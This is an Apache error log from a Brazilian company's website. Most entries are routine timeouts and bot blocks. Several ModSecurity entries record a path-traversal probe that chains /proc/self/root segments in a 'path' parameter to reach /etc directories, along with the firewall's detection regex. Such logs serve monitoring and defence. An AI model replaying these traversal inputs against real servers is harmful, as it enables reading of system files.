[Thu Mar 19 23:32:18.045857 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50134] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:32:28.713625 2026] [:error] [pid 5816:tid 140411741927168] [client 74.7.244.43:41532] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyxvJfmNfuxceSuAELDSgAAAcA"]
[Thu Mar 19 23:32:39.125821 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50268] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:33:00.125783 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:33:21.118626 2026] [proxy_fcgi:error] [pid 7545:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:50498] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:33:42.129811 2026] [proxy_fcgi:error] [pid 7235:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50658] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:34:03.121280 2026] [proxy_fcgi:error] [pid 8307:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50818] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:34:25.121830 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:34:46.129856 2026] [proxy_fcgi:error] [pid 7893:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51126] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:35:07.137778 2026] [proxy_fcgi:error] [pid 19655:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51316] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:35:29.097820 2026] [proxy_fcgi:error] [pid 20435:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:35:52.125853 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:36:15.129789 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52176] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:36:33.891497 2026] [access_compat:error] [pid 17653:tid 140411624429312] [client 216.73.216.191:60921] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 23:36:41.123235 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52630] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:37:11.133793 2026] [proxy_fcgi:error] [pid 7893:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53156] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:37:43.129806 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53804] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:37:43.884226 2026] [mime_magic:error] [pid 27293:tid 140411632822016] (70014)End of file found: [client 57.141.18.32:57560] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:38:19.069948 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54704] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:38:46.065968 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55420] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:39:07.125814 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:39:28.062426 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:39:35.298365 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.228.61:43008] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyzZ9a6ubjKNq_cu4aE8AAAA0I"]
[Thu Mar 19 23:39:49.069832 2026] [proxy_fcgi:error] [pid 7235:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:40:07.919163 2026] [mime_magic:error] [pid 30077:tid 140411616036608] (70014)End of file found: [client 57.141.18.47:33160] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:40:11.153817 2026] [proxy_fcgi:error] [pid 19655:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:40:33.124646 2026] [proxy_fcgi:error] [pid 7893:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58490] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:40:44.441199 2026] [mime_magic:error] [pid 27293:tid 140411599251200] (70014)End of file found: [client 66.249.74.160:40198] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:40:54.146057 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59210] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:40:58.369780 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] [client 178.159.38.140:43238] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Thu Mar 19 23:41:15.125788 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:41:19.361947 2026] [core:alert] [pid 17887:tid 140411599251200] [client 57.141.18.80:35196] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 23:41:37.124340 2026] [proxy_fcgi:error] [pid 7893:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60514] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:41:59.127233 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:32960] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:42:09.446404 2026] [mime_magic:error] [pid 17887:tid 140411607643904] (70014)End of file found: [client 57.141.18.34:36400] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:42:21.137814 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:42:28.811825 2026] [mime_magic:error] [pid 7235:tid 140411641214720] (70014)End of file found: [client 74.7.243.128:54682] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/systemd/system/multi-user.target.wants
[Thu Mar 19 23:42:35.202484 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.244.43:33790] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby0G-oXxyEfFpUF8f88vQAAAUQ"]
[Thu Mar 19 23:42:45.117800 2026] [proxy_fcgi:error] [pid 21219:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34224] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:43:08.913081 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:37276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby0PMdf6f5d65gmYZSpsAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:43:17.057822 2026] [proxy_fcgi:error] [pid 8307:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:43:21.187928 2026] [mime_magic:error] [pid 21563:tid 140411548894976] (70014)End of file found: [client 57.141.18.49:38388] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:43:29.301926 2026] [core:alert] [pid 17653:tid 140411641214720] [client 57.141.18.103:38594] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 23:43:29.302245 2026] [core:alert] [pid 15826:tid 140411616036608] [client 74.7.243.128:32840] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs
[Thu Mar 19 23:43:29.305795 2026] [core:alert] [pid 17887:tid 140411666392832] [client 74.7.241.31:52444] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware
[Thu Mar 19 23:44:04.133787 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:44:34.482263 2026] [mime_magic:error] [pid 17887:tid 140411649607424] (70014)End of file found: [client 57.141.18.63:40172] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:44:39.137791 2026] [proxy_fcgi:error] [pid 20435:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37276] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:44:52.085968 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.228.61:57294] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby0pBCii7xarUs8iHYaNQAAAhA"]
[Thu Mar 19 23:45:09.137802 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38064] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:45:33.089939 2026] [proxy_fcgi:error] [pid 21563:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38834] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:45:55.025843 2026] [proxy_fcgi:error] [pid 21563:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:46:16.097265 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39966] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:46:22.264290 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:56318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby0_gkwaGbbGflqUZD72AAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:46:38.123259 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40540] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:47:00.121810 2026] [proxy_fcgi:error] [pid 20435:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41104] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:47:11.331063 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:56318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1LwkwaGbbGflqUZD79AAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Thu Mar 19 23:47:19.279210 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:33084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1N-oXxyEfFpUF8f89EwAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 23:47:21.134532 2026] [proxy_fcgi:error] [pid 7545:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:47:37.486092 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.244.43:53494] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby1SfqxLDW4GITHUkSZYwAAARE"]
[Thu Mar 19 23:47:44.289890 2026] [proxy_fcgi:error] [pid 8307:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42236] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:47:49.126364 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:40938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1VeoXxyEfFpUF8f89JQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:47:50.029404 2026] [core:alert] [pid 17887:tid 140411641214720] [client 57.141.18.66:45102] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 23:48:07.129850 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:48:18.179998 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:37692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1cvqxLDW4GITHUkSZoAAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:48:25.428057 2026] [core:alert] [pid 7545:tid 140411699963648] [client 57.141.18.15:45854] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 23:48:30.042153 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43482] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:48:31.918051 2026] [:error] [pid 5816:tid 140411683178240] [client 74.7.243.128:34854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1f5fmNfuxceSuAELEeQAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:48:35.524767 2026] [mime_magic:error] [pid 7235:tid 140411658000128] (70014)End of file found: [client 57.141.18.19:46186] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:48:51.145806 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:43996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:48:59.305399 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:33496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1mwkwaGbbGflqUZD8EwAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 23:49:02.811562 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:43888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1nvu8EFLIOrSqIpvYQAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:49:16.138527 2026] [proxy_fcgi:error] [pid 21219:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44684] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:49:18.423491 2026] [mime_magic:error] [pid 7235:tid 140411733534464] (70014)End of file found: [client 57.141.18.90:47304] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:49:22.330174 2026] [mime_magic:error] [pid 14269:tid 140411599251200] (70014)End of file found: [client 57.141.18.8:47390] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:49:26.265557 2026] [:error] [pid 7545:tid 140411624429312] [client 74.7.243.128:43894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby1tn8B84UptSoTJtY_lQAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 23:49:33.727283 2026] [mime_magic:error] [pid 30077:tid 140411725141760] (70014)End of file found: [client 57.141.18.28:47714] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
